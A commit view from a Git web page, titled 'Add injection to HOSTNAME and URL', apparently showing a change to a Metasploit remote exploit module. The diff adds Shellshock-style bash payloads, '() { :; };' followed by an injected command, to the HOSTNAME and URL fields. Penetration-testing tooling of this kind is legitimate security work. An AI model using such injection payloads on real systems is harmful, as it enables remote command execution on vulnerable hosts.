Add injection to HOSTNAME and URL
parent
a31b4ecad9
commit
54e6763990
|
@ -70,6 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if hash['DOMAINNAME'].length > 255
|
||||
raise ArgumentError, 'payload too long'
|
||||
end
|
||||
|
||||
hash['HOSTNAME'] = "() { :; };#{echo}"
|
||||
hash['URL'] = "() { :; };#{echo}"
|
||||
start_service(hash)
|
||||
|
||||
begin
|
||||
|
|
Loading…
Reference in New Issue